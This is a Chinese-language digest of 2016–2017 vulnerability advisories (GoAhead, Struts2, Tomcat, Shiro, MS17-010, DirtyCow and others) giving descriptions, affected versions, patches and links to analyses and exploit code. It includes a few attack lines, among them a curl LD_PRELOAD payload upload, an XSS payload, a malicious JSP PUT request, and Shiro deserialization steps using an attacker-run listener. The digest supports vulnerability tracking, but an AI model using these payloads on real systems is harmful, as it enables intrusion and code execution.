- 漏洞描述:在初始化CGI脚本环境时,未限制用户参数中的环境变量名。该漏洞将影响所有开启了CGI脚本支持(动态链接可执行脚本文件)的GoAhead服务。通过传入恶意的LD_PRELOAD变量可以Hook服务器端的共享函数库,执行恶意动态链接对象。而且launchCgi方法会使用dup2()来处理stdin文件描述符,而它指向的是一个包含了POST请求body内容的临时文件。而Linux procfs文件系统的符号链接可以帮助我们直接引用stdin描述符,而它指向的就是我们所要找的临时文件。这样我们可以在Post Body中传入恶意Payload和相关构造器,来远程利用这个漏洞。
- PoC:curl -X POST –data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i
- 漏洞分析:http://mp.weixin.qq.com/s/fDR1tVvMJwXTeOWphUQl1Q
- 漏洞分析:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4282.html
- 【20171211】 Apache Synapse反序列化命令执行漏洞
- ApacheSynapse 3.0.1之前的版本使用了CommonsCollection-3.2.1类库,受到CommonsCollection的反序列化漏洞影响,存在命令执行漏洞
- https://mp.weixin.qq.com/s/RTRJcbkShIFiQlli_cF8Og
- 默认漏洞端口:1099,HTTP RMI服务
- 漏洞版本下载:http://synapse.apache.org/download.html
- POC: https://github.com/kxcode/snippet/blob/master/Synapse-Deserial
- 【20171130】大脏牛漏洞 - Linux提权
- 【20171127】Office Word命令执行漏洞 CVE-2017-11882
- 2017年11月14日,微软发布了11月的安全补丁更新,其中CVE-2017-11882是一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。
- 漏洞分析:http://bobao.360.cn/learning/detail/4753.html
- 利用程序:https://github.com/embedi/CVE-2017-11882
- 【20171116】CouchDB远程代码执行漏洞 - 参数污染加管理员
- 官方公告:https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
- 漏洞博客:https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
- 安全版本:2.1.1、1.7.0/1.7.1
- CVE-2017-12635、CVE-2017-12636
- 相关历史漏洞:利用query server配置项执行命令 https://www.seebug.org/vuldb/ssvid-91597
-
【20171020】Discuz竞价排行XSS漏洞
- /misc.php?mod=ranklist&type=member 添加上榜宣言
<img src=1 onerror=alert(1)>
- /misc.php?mod=ranklist&type=index 鼠标移动到当前用户头像处,触发XSS漏洞
- 补丁:https://gitee.com/ComsenzDiscuz/DiscuzX/
- /misc.php?mod=ranklist&type=member 添加上榜宣言
-
【20171019】Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
-
【20170929】Discuz!X任意文件删除漏洞
- 补丁:https://gitee.com
- 影响:Discuz! X2.5、X3.2、X3.3、X3.4
-
【20170928】Spring Data Rest远程代码执行漏洞
-
【20170920】Tomcat绕过安全限制PUT上传JSP文件,导致远程代码执行
- 分析:https://paper.seebug.org/399/
- https://mailinglist-archive.mojah.be/varia-announce/2017-09/msg00013.php
- http://tomcat.apache.org/security-7.html#Apache_Tomcat_7.x_vulnerabilities
- 影响:
7.0.0~7.0.81
- 利用:
PUT /evil.jsp/ HTTP/1.1
-
【20170920】Wordpress SQLi、XSS等高危漏洞修复
-
【20170919】Apache Optionsbleed漏洞
-
【20170908】 S2-053 Struts2 Freemarker标签远程代码执行
- https://cwiki.apache.org/confluence/display/WW/S2-053
-
【20170907】S2-052 Struts2 Rest插件反序列化命令执行漏洞
- https://cwiki.apache.org/confluence/display/WW/S2-052
- 分析:提交XML格式的恶意请求进行利用。
- 安全版本:2.3.34、2.5.13
- 【20170809】Office任意代码执行 CVE-2017-0199
- 【20170613】CVE-2017-8464 Windows快捷方式任意代码执行漏洞
- 描述:本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行。
- 利用条件:需要U盘自动播放才能发挥效果
- 影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016
- 漏洞文章: http://www.freebuf.com/news/143356.html
- 【20170512】永恒之蓝漏洞 MS17-010 CVE-2017-0144
- 描述:SMB远程命令执行漏洞。微软已于2017年3月14日发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞。
- PoC: https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
- NSA后门doublepulsar检测工具https://github.com/countercept/doublepulsar-detection-script
- 影响范围:Windows 2003、Windows 2003 R2、Windows XP、Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012 、 Windows Server 2012 R2、Windows Server 2016
- 【20170418】Fastjson反序列化漏洞
- 【20170401】Supervisord RPC服务端RCE漏洞(需认证)
- The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
- https://www.exploit-db.com/exploits/42779/
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- CVE-2017-11610
- POC: https://github.com/kxcode/snippet/blob/master/Supervisord-RCE
2016
- 【201610】DirtyCow脏牛提权漏洞CVE-2016-5195
- 影响范围:Linux 内核 >=2.6.22(2007 年发行)开始就受影响了,直到 2016 年 10 月 18 日才修复。
- PoC: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
- https://dirtycow.ninja/
- EXP: 可逃逸容器,获取反弹shell https://github.com/scumjr/dirtycow-vdso
- 影响范围https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
- 影响范围https://github.com/kcgthb/RHEL6.x-COW
- 【20160718】Shiro 1.2.4反序列化命令执行漏洞
- 描述:Cookie中rememberMe字段使用硬编码的AES加密,并且会被反序列化。所以可以被篡改为反序列化Gadget进行命令执行。
- 漏洞利用:需要根据目标的环境选择相应的Gadget,目标环境如有
"commons-collections4:4.0"
的漏洞类库,则可以用ysoserial的CommonsCollections2
payload直接打。但是如果目标环境是"commons-collections:3.1、3.2.1"
类库的话,必须用JRMPClient中转一下,攻击者服务器监听JRMPListener再用CommonsCollection6
等payload打。 - 利用分析:对于commons-collections3.2.1环境,如果直接打commonscollection的payload,会报错: java.lang.ClassNotFoundException: Unable to load ObjectStreamClass [[Lorg.apache.commons.collections.Transformer;: static final long serialVersionUID = -4803604734341277543L;]: 报错的原因是因为:Shiro resovleClass使用的是ClassLoader.loadClass()而非Class.forName(),而ClassLoader.loadClass不支持装载数组类型的class。
- 漏洞分析:直接利用CommonsCollection执行 https://paper.seebug.org/shiro-rememberme-1-2-4/
- 漏洞分析:利用JRMPListener执行 http://www.yilan.io/article/5b4dce6512d8c64b05ffd540
- 官方issue:https://issues.apache.org/jira/browse/SHIRO-550
- 漏洞延伸:https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw